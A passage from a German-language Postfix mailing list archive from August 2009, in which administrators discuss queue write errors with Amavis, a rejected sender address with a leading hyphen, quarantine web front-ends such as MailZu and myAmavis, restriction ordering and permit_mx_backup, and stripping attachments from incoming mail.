postgrey und policyd-weight der Fall, wenn diese nicht erreichbar sind. MfG Carsten -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFKgUjK1cxPeQKB3GIRAm/lAJ94AmP0ihzpGePfuQvjbHm5wqLrBwCfafpQ fJugWtPIocQ0RvYYEThDb2k= =Chtp -----END PGP SIGNATURE----- From cite+postfix-buch at incertum.net Tue Aug 11 13:44:13 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Tue, 11 Aug 2009 13:44:13 +0200 Subject: [Postfixbuch-users] queue file write error In-Reply-To: <4A8148CE.6090508@carsten-brandt.eu> References: <20090810125159.GB29820@mail.incertum.net> <20090810152656.x7ro5acjoksksco8@buero.tachtler.net> <4A8148CE.6090508@carsten-brandt.eu> Message-ID: <20090811114413.GA31881@mail.incertum.net> * Carsten Brandt : > Klaus Tachtler schrieb: >>>>> Out: 451 4.3.0 Error: queue file write error >> >> diese Fehlermeldung taucht z.B. auch auf, wenn der AMaViS auf z.B. Port >> 10024 oder den Port auf den er bei Dir horcht nicht erreichbar ist. > > Das passiert auch z.B. bei postgrey und policyd-weight der Fall, wenn > diese nicht erreichbar sind. Nein, dann würde er was von wegen "local configuration error" schreiben. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 25 Zeichen, daß Du erwachsen bist, Nummer eins: Alle Deine Hauspflanzen leben und man kann keine davon rauchen. From leo.unglaub at gmail.com Tue Aug 11 15:31:03 2009 From: leo.unglaub at gmail.com (Leo Unglaub) Date: Tue, 11 Aug 2009 15:31:03 +0200 Subject: [Postfixbuch-users] queue file write error In-Reply-To: <20090811114413.GA31881@mail.incertum.net> References: <20090810125159.GB29820@mail.incertum.net> <20090810152656.x7ro5acjoksksco8@buero.tachtler.net> <4A8148CE.6090508@carsten-brandt.eu> <20090811114413.GA31881@mail.incertum.net> Message-ID: Amavis lief aber die ganze Zeit, es sind auch dort im Log keinerlei anzeichen für einen Ausfall zu erkennen. Dass so was mal passiert kann ja sein, aber das im Log nichts zu finden ist vonder Verbindung hat mich verwirrt. Naja, ich habe diese Adresse mal auf meien Watchlist getan unddebugge dort mit, wenn sich etwas neuer Ergibt melde ich mich wieder. Vielen Dank an alle ! Leo -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From joerg.sitek at strassenfeger.org Tue Aug 11 16:30:21 2009 From: joerg.sitek at strassenfeger.org (=?iso-8859-1?Q?J=F6rg_Sitek_-_mob_e=2EV=2E?=) Date: Tue, 11 Aug 2009 16:30:21 +0200 Subject: [Postfixbuch-users] queue file write error References: <20090810125159.GB29820@mail.incertum.net><20090810152656.x7ro5acjoksksco8@buero.tachtler.net><4A8148CE.6090508@carsten-brandt.eu><20090811114413.GA31881@mail.incertum.net> Message-ID: <44DF72FC036E6347817A71713EE8397218C9AA@x-mob.strassenfeger.local> Hallo, > Amavis lief aber die ganze Zeit, es sind auch dort im Log > keinerlei anzeichen für einen Ausfall zu erkennen. hast du für das tmp Verzeichnis von amavis eine RAM Disk angelegt? Wenn ja, was sagt df -h ? Ich hatte das gleiche Problem nach dem Upgrade auf lenny. Jeder amavis Prozess hat dann sein eigenes Verzeichnis, löscht aber erst deren Inhalt, wenn der prozess das nächste mal genutzt wird. So lief bei mir die RAM-Disk voll. Nachdem ich die erweitert habe ist dieses Problem bei mir verschwunden. Gruß Jörg -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From ml at irmawi.de Tue Aug 11 20:32:24 2009 From: ml at irmawi.de (Markus Winkler) Date: Tue, 11 Aug 2009 20:32:24 +0200 Subject: [Postfixbuch-users] queue file write error In-Reply-To: References: <20090810125159.GB29820@mail.incertum.net> <20090810152656.x7ro5acjoksksco8@buero.tachtler.net> <4A8148CE.6090508@carsten-brandt.eu> <20090811114413.GA31881@mail.incertum.net> Message-ID: <4A81B938.6090404@irmawi.de> On 11.08.2009 15:31 Leo Unglaub wrote: > aber das im Log nichts zu finden ist vonder Verbindung hat mich Bei mir (Debian Lenny) steht da wenigstens was: ---- snip ---- Aug 11 13:50:10 mx2 postfix/smtpd[14791]: warning: timeout talking to proxy localhost:10024 ---- snip ---- Dieser Fehler kommt hier erst seit Upgrade auf Debian 5.0 und seit letzter Woche gehäuft. Noch dazu ist das eine Maschine, die nur versendet und dabei ein sehr geringes Transfervolumen hat - die langweilt sich die meiste Zeit. Ich muss mir dort Amavis mal genauer anschauen ... Gruß Markus From schuelli at yline.com Tue Aug 11 21:00:30 2009 From: schuelli at yline.com (Clemens Schueller) Date: Tue, 11 Aug 2009 21:00:30 +0200 Subject: [Postfixbuch-users] Bad sender address syntax Message-ID: <877hxai3ap.fsf@blue-eyes.mentenet.com> Hallo! Ich hab grad folgende Zeilen im Log gefunden: +---- | Aug 11 20:43:29 invictus fetchmail[24263]: erweckt um Die 11 Aug 2009 20:43:29 CEST | Aug 11 20:43:29 invictus fetchmail[24263]: 1 Nachricht für aon.912661853 bei mailbox.aon.at (58391 Oktetts). | Aug 11 20:43:29 invictus postfix/smtpd[24376]: connect from localhost[127.0.0.1] | Aug 11 20:43:29 invictus postfix/smtpd[24376]: warning: Illegal address syntax from localhost[127.0.0.1] in MAIL command: <-m.aubanel at agferrari.com> | Aug 11 20:43:29 invictus fetchmail[24263]: Nachricht aon.912661853 at mailbox.aon.at:1 von 1 wird gelesen (58391 Bytes) (Log-Meldung unvollständig) | Aug 11 20:43:29 invictus fetchmail[24263]: SMTP-Fehler: 501 5.1.7 Bad sender address syntax | Aug 11 20:43:29 invictus postfix/smtpd[24379]: connect from localhost[127.0.0.1] | Aug 11 20:43:29 invictus postfix/smtpd[24379]: warning: Illegal address syntax from localhost[127.0.0.1] in RCPT command: <-m.aubanel at agferrari.com> | Aug 11 20:43:29 invictus postfix/smtpd[24379]: disconnect from localhost[127.0.0.1] | Aug 11 20:43:29 invictus fetchmail[24263]: geflusht | Aug 11 20:43:29 invictus postfix/smtpd[24376]: disconnect from localhost[127.0.0.1] +---- Wie kann es passieren, dass postfix die Mail von -m.aubanel at agferrari.com ablehnt? GreetinX, Clemens Schueller From Ralf.Hildebrandt at charite.de Tue Aug 11 21:18:03 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Tue, 11 Aug 2009 21:18:03 +0200 Subject: [Postfixbuch-users] Bad sender address syntax In-Reply-To: <877hxai3ap.fsf@blue-eyes.mentenet.com> References: <877hxai3ap.fsf@blue-eyes.mentenet.com> Message-ID: <20090811191803.GL12285@charite.de> * Clemens Schueller : > Hallo! > > Ich hab grad folgende Zeilen im Log gefunden: allow_min_user = yes > | Aug 11 20:43:29 invictus postfix/smtpd[24379]: warning: Illegal address syntax from localhost[127.0.0.1] in RCPT command: <-m.aubanel at agferrari.com> -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From lists at carsten-brandt.eu Tue Aug 11 21:39:21 2009 From: lists at carsten-brandt.eu (Carsten Brandt) Date: Tue, 11 Aug 2009 21:39:21 +0200 Subject: [Postfixbuch-users] Bad sender address syntax In-Reply-To: <877hxai3ap.fsf@blue-eyes.mentenet.com> References: <877hxai3ap.fsf@blue-eyes.mentenet.com> Message-ID: <4A81C8E9.5040602@carsten-brandt.eu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Moin! Clemens Schueller schrieb: > | Aug 11 20:43:29 invictus postfix/smtpd[24376]: warning: Illegal address syntax from localhost[127.0.0.1] in MAIL command: <-m.aubanel at agferrari.com> > > Wie kann es passieren, dass postfix die Mail von -m.aubanel at agferrari.com > ablehnt? Steht doch schon im Log, eine solche Adresse ist für ihn von der Syntax ungültig. Ich vermute, dass es am - davor liegt. Wobei das laut Wikipedia gültig wäre, kann natürlich sein, dass das dort nicht exakt stimmt: http://de.wikipedia.org/wiki/E-Mail-Adresse#Der_Lokale_Teil_.28Local_Part.29 In dem Artikel sind auch die Verantwortlichen RFCs verlinkt, könnte man mal reinschaun. Auch gut möglich, dass keine - am Anfang erlaubt werden, weil UNIX-usernamen mit Bindestrich davor eher unuseablewären und meist nicht erlaubt sind. MfG Carsten -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFKgcjn1cxPeQKB3GIRAnJuAJ4wfipn4vaUv6UAyRisdr0J0q0REQCgnSGt lgxSwbFwwU3LnB5sF1dJJPk= =fkaI -----END PGP SIGNATURE----- From peter at datentraeger.li Tue Aug 11 23:56:10 2009 From: peter at datentraeger.li (Peter Beck) Date: Tue, 11 Aug 2009 23:56:10 +0200 Subject: [Postfixbuch-users] Amavis - MailZu Message-ID: <1250027770.25927.22.camel@rapunzel.datentraeger.li> Moin Leute, naja, wie soll ich anfangen...? Am besten mit ein bisschen Gejammer und Geheule: Bei uns im Buero wurde unser praechtige und stolze Postfix durch eine eierlegende Wollmilchsau-Appliance ersetzt. (und das in derselben Woche, als ich bei Peer am Kurs war und voller Enthusiasmus nach Hause ging...!) Eines der 'Features' dieser Supermaschine (*ironie*) ist unter anderem eine Art Webmail, in dem sich User selbst Spams aus der Quarantaene releasen koennen. Naja, ueber Sinn und Unsinn laesst sich jetzt streiten. Da kann ich doch eigentlich einfach alles taggen und in einen Folder "Spam" beim User verschieben....aber eben... das sehen nicht alle so... Ich moechte so etwas jetzt auch nicht unbedingt einsetzen, es geht mir mehr darum aufzuzeigen, dass es auch mit mit Postfix bzw. Amavis die Moeglichkeit gibt, so etwas zu realisieren. soweit so gut. Ich wurde dann auch fuendig mit MailZu (http://sourceforge.net/projects/mailzu/) Kann da jemand von euch ein bisschen aus dem Naehkaestchen erzaehlen ob das ueberhaupt was taugt ? Bis anhin hab ich noch nie von diesem Ding gehoert, also denke ich mir, dass das nie wirklich gross Anklang gefunden hat ? Gruss Peter From listen at papernet.de Wed Aug 12 00:06:39 2009 From: listen at papernet.de (Matthias Ebner) Date: Wed, 12 Aug 2009 00:06:39 +0200 Subject: [Postfixbuch-users] Amavis - MailZu In-Reply-To: <1250027770.25927.22.camel@rapunzel.datentraeger.li> Message-ID: <003001ca1ad0$011f03d0$0601a8c0@emnpc2> Peter Beck schrieb am Dienstag, den 11. August > Kann da jemand von euch ein bisschen aus dem > Naehkaestchen erzaehlen ob das ueberhaupt was taugt ? Naja, Nähkästchen... Ich hab das Zeug vor Kurzem mal testweise installiert, es funktioniert, konnte mich aber nicht wirklich dafür begeistern. http://myamavis.kapott.org/ zielt auch in die Richtung. Gruß Matthias From peter at datentraeger.li Wed Aug 12 00:30:43 2009 From: peter at datentraeger.li (Peter Beck) Date: Wed, 12 Aug 2009 00:30:43 +0200 Subject: [Postfixbuch-users] Amavis - MailZu In-Reply-To: <003001ca1ad0$011f03d0$0601a8c0@emnpc2> References: <003001ca1ad0$011f03d0$0601a8c0@emnpc2> Message-ID: <1250029843.24785.15.camel@rapunzel.datentraeger.li> On Wed, 2009-08-12 at 00:06 +0200, Matthias Ebner wrote: > Naja, Nähkästchen... > Ich hab das Zeug vor Kurzem mal testweise installiert, es funktioniert, > konnte mich aber nicht wirklich dafür begeistern. > > http://myamavis.kapott.org/ zielt auch in die Richtung. Hallo Matthias Wie gesagt, ich mich ehrlich gesagt auch nicht - ich moechte einfach sagen koennen "schaut - das haetten wir bereits machen *koennen*..." Ich kann mich einfach nicht an diese Appliance gewoehnen, erst recht nicht, seitdem ich Postfix ein bisschen besser kenne und weiss, was wirklich alles realisierbar ist. Es ist zum ko****. Naja, ich kenne diese Appliance noch nicht wirklich (2 Tage), bin aber *sehr* voreingenommen und kann mir nicht vorstellen, dass das Ding einem Postfix das Wasser reichen kann. Jedenfalls diese Klickibunti Konfiguration macht mich wahnsinnig und es ist ein Fest, abends beim eigenen Postfix etwas "normal" zu konfigurieren... Gruss und Danke fuer den Input Peter From driessen at fblan.de Wed Aug 12 09:00:19 2009 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 12 Aug 2009 09:00:19 +0200 Subject: [Postfixbuch-users] Amavis - MailZu In-Reply-To: <1250027770.25927.22.camel@rapunzel.datentraeger.li> References: <1250027770.25927.22.camel@rapunzel.datentraeger.li> Message-ID: <005f01ca1b1a$8db576e0$0565a8c0@uwe> On Behalf Of Peter Beck > Moin Leute, > > naja, wie soll ich anfangen...? > Am besten mit ein bisschen Gejammer und Geheule: > Bei uns im Buero wurde unser praechtige und stolze Postfix > durch eine eierlegende Wollmilchsau-Appliance ersetzt. > (und das in derselben Woche, als ich bei Peer am Kurs war > und voller Enthusiasmus nach Hause ging...!) > > Eines der 'Features' dieser Supermaschine (*ironie*) ist > unter anderem eine Art Webmail, in dem sich User selbst > Spams aus der Quarantaene releasen koennen. Und warum braucht das die Maschine? Es KÖNNTEN ja false positive dabei sein. Also wird nichts rejectet und sei es noch so verdorben es wird in einen "SPAM" Ordner gelegt den dann der "USER" in seiner Arbeitszeit immer wieder durchsuchen und nach den doch gewünschten Mails fahnden muss. Was bringt das ganze? Neue Arbeitsplätze (sehr schön) weil alle mit dem Spam/Ham sortieren beschäftigt sind. Was macht der "USER" ? "das ist getaggt das kann ich löschen" und haut dann wirklich 500 Mails Montagmorgens im Spamordner einfach so weg mit allen RECHTLICHEN Konsequenzen. Da gibt es eigentlich keine DISKUSSIONSGRUNDLAGE wer Mails und Arbeitszeit vernichten möchte kann gerne so vorgehen. Hier auf diesem Server und auf allen die ich mitbetreue gibt es nur ich nehme an oder ich rejecte bei bestimmten punkten oder Merkmalen. Auch getaggte Mails werden dem User ins "normale" incomming gelegt (bei einer handvoll im Monat die das betrifft kann das der User dann auch wirklich nachschauen). Vorteil es gehen "KEINE" Mails durch User verloren weil versehentlich gelöscht er muß ja keine hunderte Mails durchforsten. Der Absender wird sofort verständigt und kann seine Mail anders gestalten oder über andere Wege schicken. Rechtlich gesehen der bessere Weg denn was nicht beim Empfänger ankommt (vom Server nicht angenommen wurde) muß nicht für gehaftet werden. > > Naja, ueber Sinn und Unsinn laesst sich jetzt streiten. > Da kann ich doch eigentlich einfach alles taggen und in > einen Folder "Spam" beim User verschieben....aber eben... > das sehen nicht alle so... Lass Peer mal mit deinem Chef reden *gg Peer hat da "durchschlagende" Argumente für. > > Ich moechte so etwas jetzt auch nicht unbedingt einsetzen, > es geht mir mehr darum aufzuzeigen, dass es auch mit mit > Postfix bzw. Amavis die Moeglichkeit gibt, so etwas zu realisieren. Wurde die Mail vom Server angenommen und dem User zugestellt dann haftet dieser auch für alles was mit der Mail passiert mit allen rechtlichen Konsequenzen egal ob die als Spam getaggt war und im SPamordner gelandet ist aus welchen Gründen auch immer. Es kann sich niemand darauf rausreden ich hab die Mail nicht gesehen weil die im Spamordner war. Mal einen Vergleich: wichtiger Brief vom Finanzamt mit Fristsetzung etwas bestimmtest zu zahlen wird aus versehen von der Sekretärin im Sortierordner unter unwichtigem zwischen allen Arten von Werbung abgelegt und dadurch nicht bearbeitet bzw. dann später weggeworfen weil einfach nicht mehr gesehen. Das Finanzamt geht nach Fristablauf hin und sperrt die Konten der Firma und pfändet den Betrag. Versuch da mal die Ausrede ich hab das nicht bekommen oder gesehen funzt nicht. In deinem Briefkasten gelandet, in deinen Rechtsbereich zugestellt hast du dafür sorge zu tragen das alles bearbeitet wird. Das mit dem taggen und Spamordner ablegen lasse ich evtl. noch bei den Freemailern gelten aber als Firmenmailserver gibt es eigentlich nur annehmen und zustellen ODER dem Postboten wieder mitgeben mit dem Vermerk Annahme verweigert (Beim Finanzamt funktioniert das allerdings nicht *gg) Getreu der Maxime keine Mail darf verloren gehen lass es sein. Wenn Cheffee Arbeitszeit und Mails vernichten möchte häng dich nicht rein. Es gibt sicherlich wichtigeres für dich im Betrieb zu tun. Teile deinem Chef deine Bedenken mit, stell das Teil genau so ein wie dein Chef es dir SCHRIFTLICH angewiesen hat, Archiviere die Anweisungen und mach dir keine weiteren Gedanken. Manche Chefs müssen einfach einen Haufen Geld für bestimmte Dinge ausgeben wovon Sie wenig Ahnung haben damit Sie im Golfclub damit angeben können was Sie wieder für "unsinnige" Dinge angeschafft haben und das es ja wieder soviel Geld war. Kommt gleich hinter dem roten Ferrari auf dem Parkplatz. > > soweit so gut. Ich wurde dann auch fuendig mit MailZu > (http://sourceforge.net/projects/mailzu/) > > Kann da jemand von euch ein bisschen aus dem > Naehkaestchen erzaehlen ob das ueberhaupt was taugt ? > > Bis anhin hab ich noch nie von diesem Ding gehoert, also > denke ich mir, dass das nie wirklich gross Anklang gefunden hat ? s.o. wofür denn auch? Kann ich mir sparen wenn ich meinen Mailserver sauber konfiguriert habe. > > Gruss Peter > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From klaus at tachtler.net Wed Aug 12 10:24:17 2009 From: klaus at tachtler.net (Klaus Tachtler) Date: Wed, 12 Aug 2009 10:24:17 +0200 Subject: [Postfixbuch-users] Amavis - MailZu In-Reply-To: <1250027770.25927.22.camel@rapunzel.datentraeger.li> References: <1250027770.25927.22.camel@rapunzel.datentraeger.li> Message-ID: <20090812102417.h990l6x008088sgc@buero.tachtler.net> Hallo Peter, > > soweit so gut. Ich wurde dann auch fuendig mit MailZu > (http://sourceforge.net/projects/mailzu/) > > Kann da jemand von euch ein bisschen aus dem > Naehkaestchen erzaehlen ob das ueberhaupt was taugt ? > > Bis anhin hab ich noch nie von diesem Ding gehoert, also > denke ich mir, dass das nie wirklich gross Anklang gefunden hat ? > ich habe mich auch mal ein bisschen mit einem Tool (MailZU und myAmavis) beschäftigt und bin aktuell, auch aus Testzwecken dazu übergegangen **myAmavis** und nicht MailZu einzusetzen. Der Grund war auch, dass ich mich mit dem Programmierer von myAmavis ein wenig ausgetauscht habe und er myAmavis auf jeden Fall auch nach pers. Wünschen weiterentwickelt (Support für MySQL hat er realisiert usw.) Wenn Du da mal was machen willst, ich habe eine Anleitung **für mich** zur Installation von myAmavis geschrieben (http://www.dokuwiki.tachtler.net/doku.php?id=tachtler:postfix_amavis_myamavis_installieren) geschrieben. Was ich an myAmavis sehr nett finde, die Statistik Seite(n)... Falls Du ein wenig Hilfe brauchst bei der Konfiguration von myAmavis, sag bescheid... Grüße Klaus. -- ---------------------------------------- e-Mail : klaus at tachtler.net Homepage: http://www.tachtler.net ---------------------------------------- From gerald at holl.co.at Wed Aug 12 11:28:03 2009 From: gerald at holl.co.at (Gerald Holl) Date: Wed, 12 Aug 2009 11:28:03 +0200 Subject: [Postfixbuch-users] Reihenfolge der Restrictions bei DKIM In-Reply-To: <002601ca1a51$2a66be10$0565a8c0@uwe> References: <4A806DDB.3080904@holl.co.at> <002601ca1a51$2a66be10$0565a8c0@uwe> Message-ID: <4A828B23.60000@holl.co.at> Uwe Driessen wrote: >> In der Doku zu amavis habe ich heute zufällig entdeckt, dass man die >> beiden check_sender_access Anweisungen keinesfalls in >> smtpd_recipient_restrictions reingeben soll, sondern nur in >> smtpd_sender_restrictions, weil bei mehreren Empfängern ein 'surprising >> (and incorrect) result' auftreten kann. Heißt das nun, ich soll die >> beiden Anweisungen zu den sender restrictions geben? Warum? > > Mehrere Empfänger von dir aus gesehen also abgehende Mails werden tangiert solange der > User über permit sasl, mynetwork schon vorher den Test verlassen hat. Aber mir ist trotzdem nicht klar, warum die amavis Doku von einem incorrect result spricht. > Reinkommend ist es eigentlich auch kein Problem denn den Absender willst du (dunno, > Verzeigung in weiter checks oder gar ok(nicht zu empfehlen)) oder du willst ihn nicht > transportieren dann bekommt er ein reject. > Probleme können lediglich auftauchen wenn du das Ganze User bezogen machst und der eine > will den Absender und der andere nicht. Dann kann es vorkommen, bei einer Mail von diesem > Absender an mehrere Empfänger auf deinem Server, das die Mail komplett abgewiesen wird. User-bezogen läuft nichts ab, also sollte das bei den eingehenden Mails kein Problem darstellen. Viele Grüße, Gerald From driessen at fblan.de Wed Aug 12 12:15:31 2009 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 12 Aug 2009 12:15:31 +0200 Subject: [Postfixbuch-users] Reihenfolge der Restrictions bei DKIM In-Reply-To: <4A828B23.60000@holl.co.at> References: <4A806DDB.3080904@holl.co.at> <002601ca1a51$2a66be10$0565a8c0@uwe> <4A828B23.60000@holl.co.at> Message-ID: <001301ca1b35$d29d20d0$0565a8c0@uwe> On Behalf Of Gerald Holl > Uwe Driessen wrote: > >> In der Doku zu amavis habe ich heute zufällig entdeckt, dass man die > >> beiden check_sender_access Anweisungen keinesfalls in > >> smtpd_recipient_restrictions reingeben soll, sondern nur in > >> smtpd_sender_restrictions, weil bei mehreren Empfängern ein 'surprising > >> (and incorrect) result' auftreten kann. Heißt das nun, ich soll die > >> beiden Anweisungen zu den sender restrictions geben? Warum? > > > > Mehrere Empfänger von dir aus gesehen also abgehende Mails werden tangiert solange der > > User über permit sasl, mynetwork schon vorher den Test verlassen hat. Oh oh mal wieder zu schnell geschrieben da fehlt das " NICHT tangiert " > > Aber mir ist trotzdem nicht klar, warum die amavis Doku von einem > incorrect result spricht. Aus den unten genannten Gründen eben wenn Userbezogen Black und Whitelisting in Amavis DANN kann es zu incorrect result kommen. > > > Reinkommend ist es eigentlich auch kein Problem denn den Absender willst du (dunno, > > Verzeigung in weiter checks oder gar ok(nicht zu empfehlen)) oder du willst ihn nicht > > transportieren dann bekommt er ein reject. > > Probleme können lediglich auftauchen wenn du das Ganze User bezogen machst und der > eine > > will den Absender und der andere nicht. Dann kann es vorkommen, bei einer Mail von > diesem > > Absender an mehrere Empfänger auf deinem Server, das die Mail komplett abgewiesen > wird. > > User-bezogen läuft nichts ab, also sollte das bei den eingehenden Mails > kein Problem darstellen. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From klopp76 at gmx.de Wed Aug 12 12:37:08 2009 From: klopp76 at gmx.de (klopp76 at gmx.de) Date: Wed, 12 Aug 2009 12:37:08 +0200 Subject: [Postfixbuch-users] Anhang entfernen Email aber weiterleiten? Message-ID: <000001ca1b38$d7fe3480$87fa9d80$@de> Hallo, ist es im Postfix möglich bei einer ankommendenen Email mit Anhang, den Anhang zu entfernen, die Email weiterzuleiten und dem Absender einer automatische Benachrichtigung zu schicken, dass die Email angekommen ist, der Anhang aber entfernt wurde? Dies soll wenn möglich nicht auf alle Postfächer zu treffen, sondern nur auf ein paar ausgewählte. Schon mal danke fürs Antworten. Grüße -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From p.heinlein at heinlein-support.de Wed Aug 12 15:32:52 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 12 Aug 2009 15:32:52 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Reihenfolge_von_Black-/Whiteli?= =?iso-8859-1?q?sting_und=09reject=5Funauth=5Fdestination_in_smtpd=5Frecip?= =?iso-8859-1?q?ient=5Frestrictions?= In-Reply-To: <4A8060A3.2080108@drobic.de> References: <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> <4A8060A3.2080108@drobic.de> Message-ID: <200908121532.52825.p.heinlein@heinlein-support.de> Am Montag, 10. August 2009 schrieb Sandy Drobic: > Der Check gilt als "deprecated", da er sich in der Tat ausnutzen lässt. Ansichtssache. Ich liebe ihn und setze ihn sehr gerne ein. > Wenn ich in meiner Domain deinen Server als zweiten MX eintrage, sagt > permit_mx_backup "OK" an der Stelle, wo du permit_mx_backup einträgst. Ja, aber, damit hier keine Mißverständnisse entstehen_ Für Mails an DEINE Domain. Das ist KEIN Open Relay. > Im besten Fall kann ich dann die Spam-Checks umgehen, im schlimmsten Nö, wieso? > Fall kann ich deinen Server als Relay verwenden. Je nachdem, an welcher > Stelle du permit_mx_backup einträgst. Wieso schlimmsten Fall? Das ist für den Besitzer des Servers ein Sechser im Lotto. Je nachdem, was derjenige, der mich mißbraucht hat (bzw. es versucht hat) dafür zahlt, daß ich ihm seine Mails wieder rausrücke. Haten wir ja vor ein paar Wochen mal auf der Liste und ist m.W.n. auch irgendwo im Buch begrüdet. > Generell wird es nicht ermutigt, da du damit eine Einstellung > überprüfst, die eventuell von einem nicht vertrauenswürdigen Dritten > vorgenommen werden kann. Und? Aber, kalr: Wenn man kein Backup ist, dann sollte man ihn auch nicht einbauen. Wozu. Aber wenn man eines ist kann man das problemlos nutzen. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From klopp76 at gmx.de Thu Aug 13 09:10:46 2009 From: klopp76 at gmx.de (klopp76 at gmx.de) Date: Thu, 13 Aug 2009 09:10:46 +0200 Subject: [Postfixbuch-users] Anhang entfernen Email aber weiterleiten? In-Reply-To: <000001ca1b38$d7fe3480$87fa9d80$@de> References: <000001ca1b38$d7fe3480$87fa9d80$@de> Message-ID: <000b01ca1be5$2e015360$8a03fa20$@de> Von: postfixbuch-users-bounces at listen.jpberlin.de [mailto:postfixbuch-users-bounces at listen.jpberlin.de] Im Auftrag von klopp76 at gmx.de Gesendet: Mittwoch, 12. August 2009 12:37 An: 'Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein.' Betreff: [Postfixbuch-users] Anhang entfernen Email aber weiterleiten? Hallo, ist es im Postfix möglich bei einer ankommendenen Email mit Anhang, den Anhang zu entfernen, die Email weiterzuleiten und dem Absender einer automatische Benachrichtigung zu schicken, dass die Email angekommen ist, der Anhang aber entfernt wurde? Dies soll wenn möglich nicht auf alle Postfächer zu treffen, sondern nur auf ein paar ausgewählte. Schon mal danke fürs Antworten. Grüße Guten Morgen, hat hier denn keiner einen Tipp für mich? Grüße -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From Beat.Jucker at glue.ch Thu Aug 13 09:27:37 2009 From: Beat.Jucker at glue.ch (Beat Jucker) Date: Thu, 13 Aug 2009 09:27:37 +0200 Subject: [Postfixbuch-users] Anhang entfernen Email aber weiterleiten? In-Reply-To: <000b01ca1be5$2e015360$8a03fa20$@de> References: <000001ca1b38$d7fe3480$87fa9d80$@de> <000b01ca1be5$2e015360$8a03fa20$@de> Message-ID: <20090813092737.A21347@calvin.glue.ch> > ist es im Postfix möglich bei einer ankommendenen Email mit Anhang, den > Anhang zu entfernen, die Email weiterzuleiten und dem Absender einer > automatische Benachrichtigung zu schicken, dass die Email angekommen ist, > der Anhang aber entfernt wurde? > hat hier denn keiner einen Tipp für mich? Ich wuerde diese Funktion wahrscheinlich selber implementieren. Mit etwas Scripting (Perl oder TCL) und MIME Kenntnissen ist dies keine Hexerei. Da man das Rad aber nicht immer selber erfinden sollte, koenntest Du evtl clamav erweitern, damit Deine speziellen Beduerfnisse erfuellt werden. Sehr wahrscheinlich gibt es aber noch bessere Loesungen ... Gruss -- Beat From Ralf.Hildebrandt at charite.de Thu Aug 13 10:13:55 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 13 Aug 2009 10:13:55 +0200 Subject: [Postfixbuch-users] Anhang entfernen Email aber weiterleiten? In-Reply-To: <000b01ca1be5$2e015360$8a03fa20$@de> References: <000001ca1b38$d7fe3480$87fa9d80$@de> <000b01ca1be5$2e015360$8a03fa20$@de> Message-ID: <20090813081355.GF23992@charite.de> * klopp76 at gmx.de : > ist es im Postfix möglich bei einer ankommendenen Email mit Anhang, den > Anhang zu entfernen, die Email weiterzuleiten und dem Absender einer > automatische Benachrichtigung zu schicken, dass die Email angekommen ist, > der Anhang aber entfernt wurde? > > Dies soll wenn möglich nicht auf alle Postfächer zu treffen, sondern nur auf > ein paar ausgewählte. Spontan würde mir nur ein content_filter mit altermime einfallen -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From tb at ostc.de Thu Aug 13 10:14:37 2009 From: tb at ostc.de (Thomas Birnthaler) Date: Thu, 13 Aug 2009 10:14:37 +0200 Subject: [Postfixbuch-users] Anhang entfernen Email aber weiterleiten? In-Reply-To: <000001ca1b38$d7fe3480$87fa9d80$@de> References: <000001ca1b38$d7fe3480$87fa9d80$@de> Message-ID: <200908131014.37909.tb@ostc.de> > ist es im Postfix möglich bei einer ankommendenen Email mit Anhang, > den Anhang zu entfernen, die Email weiterzuleiten und dem Absender > einer automatische Benachrichtigung zu schicken, dass die Email > angekommen ist, der Anhang aber entfernt wurde? > > Dies soll wenn möglich nicht auf alle Postfächer zu treffen, sondern > nur auf ein paar ausgewählte. In Postfix nicht, aber qpsmtpd (http://smtpd.develooper.com) eignet sich dafür, wenn man einen geeigneten Plugin dafür implementiert. Wir haben damit so etwas ähnliches realisiert und in Postfix "eingeklinkt", siehe http://www.ostc.de/projects.html#qpsmtpd-plugins. Müsste man für deinen Anwendungsfall noch etwas erweitern. Thomas Birnthaler -- OSTC Open Source Training and Consulting GmbH / HRB Nuernberg 20032 tel +49 911-3474544 / fax +49 911-1806277 / http://www.ostc.de Delsenbachweg 32 / D-90425 Nuernberg / 